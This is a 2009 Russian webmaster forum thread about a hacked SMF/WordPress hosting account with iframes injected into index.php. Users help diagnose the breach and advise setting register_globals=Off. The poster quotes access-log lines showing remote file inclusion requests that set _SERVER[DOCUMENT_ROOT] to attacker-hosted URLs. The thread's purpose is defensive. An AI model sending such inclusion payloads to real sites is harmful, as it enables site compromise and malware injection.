22.06.2009, 11:26 | #1 |
Специалист
Регистрация: 05.08.2008
Сообщений: 448
Вес репутации: 212
|
Меня поломали слегка
Вчера сижу на своём форуме, никого не трогаю. В какой то момент замечаю, что страница долго грузится, отправляя (получая ли) запрос на что-то вроде dajtedenegmnesejchas.com.
Смотрю код страницы - в футере, в самом низу, добавлен iframe код со ссылкой на вышеуказанный сайт. Смотрю остальные сайты на этом ftp - код вставлен на всех сайтах в index.php. Разные движки сайтов, есть Wordpress и SMF (форум), на последний, кстати, грешу больше всего. Теперь вопрос: КАК? Доступа по фтп небыло - логи фтп чистые. Пароли в клиентах и браузерах не храню - вбиваю вручную или копипастю. Проверился на вирусы - NOD молчит, avz нашёл кучу всего, но ведь явно дело не в вирусах, если доступа по фтп небыло? В общем, стандартную процедуру я сделал - всё что можно было поменять, поменял, всё что можно было вычистить - вычистил. Может кто подскажет ещё: как по логам узнать, откуда пришла зараза и что происходило с сайтами? |
22.06.2009, 11:35 | #3 |
Специалист
|
Скорее всего инклуд был, логи апаче смотрите
__________________
|
22.06.2009, 11:44 | #4 |
шайтанама
|
вирутал хосты на серванте в одной папке ???
если да, то через дырку в движке шел сделали.
__________________
МордоКнига |
22.06.2009, 12:06 | #5 |
Специалист
Регистрация: 05.08.2008
Сообщений: 448
Вес репутации: 212
|
|
22.06.2009, 12:19 | #6 | |
шайтанама
|
Цитата:
Если есть чего нить типа webstata ... то там можно поискать "неправильные" запросы к сайту
__________________
МордоКнига |
|
22.06.2009, 12:33 | #7 |
Специалист
|
на присутствие левых данных(урлов) в запросах к сайту
__________________
|
22.06.2009, 14:49 | #8 |
Специалист
Регистрация: 05.08.2008
Сообщений: 448
Вес репутации: 212
|
Хм. Влогах доступа к форуму есть:
216.139.67.116 - - [22/Jun/2009:01:10:22 +0400] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.portalsana.com.br/SiJi?? HTTP/1.0" 200 29899 "-" "Mozilla/5.0" 216.139.67.116 - - [22/Jun/2009:01:10:22 +0400] "GET /index.php?action=sitemap;xml/?_SERVER[DOCUMENT_ROOT]=http://www.portalsana.com.br/SiJi?? HTTP/1.0" 200 17769 "-" "Mozilla/5.0" Описание нашёл здесь: http://www.lh-news.com/main.php Real-Time Internet Report on Jun 2009 Dangerous Domains Только по времени не сходится - в час ночи по москве я уже всё почистил... Посмотрю ещё Добавлено через 1 час 40 минут Нашёл ещё один запрос с того же айпишника (это уже в логах форума - все остальные логи чистые): http://***************.ru/index.php?...p;xml/?_SERVER[DOCUMENT_ROOT]=http://www.italiaiuta.org/docs/Conf?? Если я правильно понимаю, хакают через плагин сайтмапы. Пошёл курить форумы. Всем спасибо! Последний раз редактировалось cool; 22.06.2009 в 14:49. Причина: Добавлено сообщение |
22.06.2009, 14:52 | #9 |
Добрый модератор
Регистрация: 09.07.2007
Адрес: глобус Украины
Сообщений: 27,600
Вес репутации: 1025
|
cool, register_globals=Off
__________________
Правильный хостинг. В личке бесплатно не отвечаю обычно. |
|
|
Похожие темы | ||||
Тема | Автор | Раздел | Ответов | Последнее сообщение |
Кажется WebMoney поломали... | ninzza | Курилка | 39 | 12.01.2009 20:11 |
Без меня меня женили | graver | Вопросы по работе системы | 27 | 18.11.2008 00:29 |
поиск умер слегка.. | lipsko | Ошибки при работе с системой | 15 | 08.07.2008 18:54 |
Это только у меня? | web13 | Яндекс | 4 | 27.11.2007 08:02 |
За что меня в BL? | vitich | Вопросы по работе системы | 5 | 25.10.2007 16:25 |
Часовой пояс GMT +3, время: 20:13.